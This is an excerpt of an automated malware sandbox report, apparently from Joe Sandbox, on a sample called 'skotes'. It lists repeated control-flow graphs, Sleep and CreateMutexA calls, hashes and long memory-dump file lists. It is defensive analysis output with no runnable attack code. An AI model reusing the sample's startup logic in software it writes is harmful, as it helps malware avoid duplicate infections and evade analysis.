                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: f5aefe5b9a58a63c24effe802cd1b067f06cb55baf0cd5ee3d9dedce40edb84b
                                                                                                                                                                                                                                                              • Instruction ID: a79246dbddb035692631126323f3252051e3d21b8d3abc0f18fc09cb313f4904
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5aefe5b9a58a63c24effe802cd1b067f06cb55baf0cd5ee3d9dedce40edb84b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37312A717043049BEB189B78DDC9B9DB7A6DBCA314F285229E014BB3D5D7366980C712

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 90 eaa1ae-eaa1ce 94 eaa1fc-eaa218 90->94 95 eaa1d0-eaa1dc 90->95 98 eaa21a-eaa226 94->98 99 eaa246-eaa265 94->99 96 eaa1de-eaa1ec 95->96 97 eaa1f2-eaa1f9 call ebd663 95->97 96->97 104 eaa935 96->104 97->94 100 eaa228-eaa236 98->100 101 eaa23c-eaa243 call ebd663 98->101 102 eaa293-eaa916 call eb80c0 99->102 103 eaa267-eaa273 99->103 100->101 100->104 101->99 107 eaa289-eaa290 call ebd663 103->107 108 eaa275-eaa283 103->108 110 eaa953-eaa994 Sleep CreateMutexA 104->110 111 eaa935 call ed6c6a 104->111 107->102 108->104 108->107 120 eaa996-eaa998 110->120 121 eaa9a7-eaa9a8 110->121 111->110 120->121 122 eaa99a-eaa9a5 120->122 122->121
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: c2a4cff642a93786903c52ff12ca5282377f4252c32aa0ea918dd16d6390cd1c
                                                                                                                                                                                                                                                              • Instruction ID: b6e2eefcacde653638e6b25a061fda7192020f071c961422d223648051f0a76b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a4cff642a93786903c52ff12ca5282377f4252c32aa0ea918dd16d6390cd1c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15310B717043009BEB189FA8DC8D79DB7A6EBCB310F285229E014BB3D5D7366980C722

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 124 eaa418-eaa438 128 eaa43a-eaa446 124->128 129 eaa466-eaa482 124->129 130 eaa448-eaa456 128->130 131 eaa45c-eaa463 call ebd663 128->131 132 eaa4b0-eaa4cf 129->132 133 eaa484-eaa490 129->133 130->131 136 eaa93f-eaa949 call ed6c6a * 2 130->136 131->129 134 eaa4fd-eaa916 call eb80c0 132->134 135 eaa4d1-eaa4dd 132->135 138 eaa492-eaa4a0 133->138 139 eaa4a6-eaa4ad call ebd663 133->139 140 eaa4df-eaa4ed 135->140 141 eaa4f3-eaa4fa call ebd663 135->141 155 eaa94e 136->155 156 eaa949 call ed6c6a 136->156 138->136 138->139 139->132 140->136 140->141 141->134 157 eaa953-eaa994 Sleep CreateMutexA 155->157 158 eaa94e call ed6c6a 155->158 156->155 160 eaa996-eaa998 157->160 161 eaa9a7-eaa9a8 157->161 158->157 160->161 162 eaa99a-eaa9a5 160->162 162->161
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 1945efea44947f88fd2c4c091da308ac03db60debbb46f6b3adca7cc4bf4d91e
                                                                                                                                                                                                                                                              • Instruction ID: 10db2de421e717aec99587262c08f1de4999dd2f39b6df01f388ebfb3c0cee6f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1945efea44947f88fd2c4c091da308ac03db60debbb46f6b3adca7cc4bf4d91e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B13108317043009BEB089BB8D88D7ADB7A5EBCE314F285229E014BB3D5D7756981C752

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 164 eaa54d-eaa56d 168 eaa59b-eaa5b7 164->168 169 eaa56f-eaa57b 164->169 170 eaa5b9-eaa5c5 168->170 171 eaa5e5-eaa604 168->171 172 eaa57d-eaa58b 169->172 173 eaa591-eaa598 call ebd663 169->173 174 eaa5db-eaa5e2 call ebd663 170->174 175 eaa5c7-eaa5d5 170->175 176 eaa632-eaa916 call eb80c0 171->176 177 eaa606-eaa612 171->177 172->173 178 eaa944-eaa949 call ed6c6a 172->178 173->168 174->171 175->174 175->178 182 eaa628-eaa62f call ebd663 177->182 183 eaa614-eaa622 177->183 190 eaa94e 178->190 191 eaa949 call ed6c6a 178->191 182->176 183->178 183->182 195 eaa953-eaa994 Sleep CreateMutexA 190->195 196 eaa94e call ed6c6a 190->196 191->190 198 eaa996-eaa998 195->198 199 eaa9a7-eaa9a8 195->199 196->195 198->199 200 eaa99a-eaa9a5 198->200 200->199
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
